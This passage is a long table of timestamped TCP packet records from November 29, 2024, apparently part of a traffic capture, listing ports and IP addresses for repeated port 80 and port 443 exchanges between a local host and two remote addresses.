                                                                                                                                                                                    Nov 29, 2024 19:49:36.571084976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.571394920 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.571969986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.572087049 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.572320938 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.573071957 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.573177099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.573230982 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.574147940 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.574245930 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.574299097 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.575267076 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.575426102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.575505972 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.576292038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.576402903 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.576498985 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.577409983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.577521086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.577567101 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.578490019 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.578598976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.578706980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.579612017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.579727888 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.579811096 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.580655098 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.580780983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.580892086 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.581743002 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.581901073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.581942081 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.582825899 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.582947016 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.583031893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.583893061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.597080946 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614388943 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614448071 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614548922 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614711046 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614723921 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614738941 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.614743948 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.617697954 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.617739916 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.617999077 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.618160009 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.618174076 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.706427097 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.729060888 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.729176998 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.729228973 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.729315042 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.729377985 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.729471922 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.730036974 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.730093956 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.730240107 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.731147051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.731288910 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.731389999 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.732251883 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.732352018 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.732409000 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.733298063 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.733392954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.733444929 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.734440088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.734514952 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.734601974 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.735459089 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.735538960 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.735583067 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.736546040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.736655951 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.737266064 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.737704039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.737822056 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.737873077 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.738737106 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.738806009 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.738868952 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.739816904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.739945889 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.740037918 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.740935087 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.741019011 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.741058111 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.741940975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.741998911 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.742038965 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.743124008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.743228912 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.743271112 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.744174957 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.744292021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.744330883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.745235920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.745357037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.745452881 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.746298075 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.746440887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.746577978 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.747389078 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.747555017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.747610092 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.748498917 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.748632908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.748671055 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.749566078 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.749624014 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.749667883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.750638962 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.750736952 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.750849962 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.751759052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.751842976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.752268076 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.752942085 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.753056049 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.753106117 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.753936052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.754163027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.754210949 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.755060911 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.755081892 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.755137920 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.756068945 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.756182909 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.756350040 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.757178068 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.757297039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.757343054 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.758249998 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.758392096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.758469105 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.759324074 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.759510040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.759670973 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.760411978 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.760529041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.760582924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.761468887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.761598110 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.761689901 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.762562037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.762693882 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.762737989 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.763659954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.763780117 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.763825893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.764744997 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.764805079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.764974117 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.765863895 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.765916109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.765959024 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.766967058 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.767055035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.767187119 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.768018007 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.768213034 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.768254995 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.769126892 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.769253969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.770232916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.770284891 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.770375013 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.771279097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.771326065 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.771344900 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.771497011 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.772412062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.772572041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.773514986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.773581028 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.773631096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.773691893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.774549961 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.774667025 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.774780035 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.775631905 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.775660992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.775710106 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.776721001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.776846886 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.777831078 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.778007984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.778099060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.778136969 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.779184103 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.779232979 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.779433966 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.780158997 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.780214071 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.780271053 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.781059027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.781192064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.781291962 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.782181978 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.782372952 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.782433033 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.783281088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.783395052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.783503056 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.784323931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.784475088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.784533978 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.785392046 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.830636024 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.838598967 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.839040995 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.839056969 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.839551926 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:36.839557886 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.931189060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.931350946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.931404114 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.931660891 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.931828022 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.931873083 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.932769060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.932945013 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.932991028 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.933895111 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.934070110 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.934206963 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.935019970 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.935188055 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.935231924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.936152935 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.936312914 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.936424971 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.937105894 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.937403917 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.937454939 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.938312054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.938487053 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.939505100 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.939827919 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.939986944 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.940035105 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.940573931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.940587044 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.940632105 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.941440105 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.941591978 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.941636086 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.942526102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.942681074 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.942734003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.943881989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.943895102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.943939924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.944803953 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.944962978 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.945005894 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.945790052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.945960045 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.945998907 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.946913958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.947061062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.947108030 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.948111057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.948123932 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.948252916 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.949084044 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.949259043 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.949299097 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.950222969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.950371981 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.951318979 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.951366901 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.951463938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.952311039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.952362061 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.952469110 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.953178883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.953353882 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.953681946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.953726053 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.954622984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.954637051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.954679966 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:36.955672979 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.955684900 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:36.955703974 CET8049755185.215.113.16192.168.2.6
